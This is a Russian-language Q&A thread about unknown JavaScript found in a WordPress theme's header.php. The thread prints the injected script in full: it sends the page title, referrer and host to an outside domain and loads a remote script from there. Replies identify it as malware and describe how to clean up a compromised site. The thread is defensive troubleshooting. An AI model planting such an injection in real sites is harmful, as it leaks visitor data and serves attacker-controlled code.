2016-01-09 3 views
1

Я нашел ниже код в файле header.php темы, и я не уверен, в чем они суть.Неизвестный код, найденный в файле header.php файла wordpress

<script> 
    var a = ''; 
    setTimeout(10); 
    var default_keyword = encodeURIComponent(document.title); 
    var se_referrer = encodeURIComponent(document.referrer); 
    var host = encodeURIComponent(window.location.host); 
    var base = "http://tradenetservice.com/js/jquery.min.php"; 
    var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; 
    var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); 
    if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== '') { 
     document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>'); 
    } 
</script> 
+0

Это похоже на вредоносное ПО, возможно, ваш WordPress уже взломан. – Milap

+0

Добро пожаловать в SO. Пожалуйста, посетите [помощь], чтобы узнать, что спросить и как. Похоже, что у вас есть реклама – mplungjan

ответ

1

У меня был взломанный сайт Wordpress всего неделю назад с аналогичной инъекцией. Был добавлен код в моем header.php, что перенаправление пользователей на внешние сайты (рекламу, порно), только если сайт был просматриваться с мобильным телефона.

Другие файлы в активной теме также были введены.

Что я сделал, это загрузить все файлы сайта и сравнить их с резервной копией. Таким образом, я нашел введенный код в теме, а также некоторые файлы внутри/wp-includes /, которые не были частью обычной установки Wordpress, бэкдор сорта.

Также проверьте wp-load.php на корне сайта, в моем случае файл, который я удалил из/wp-includes /, был включен/выполнен в форме дополнительной строки в этом файле.

В дополнение к очистке кода вашего сайта, вы должны выполнить поиск защиты вашего сайта Wordpress от взлома и найдете множество рекомендованных мер, чтобы попытаться предотвратить его повторение.

Смежные вопросы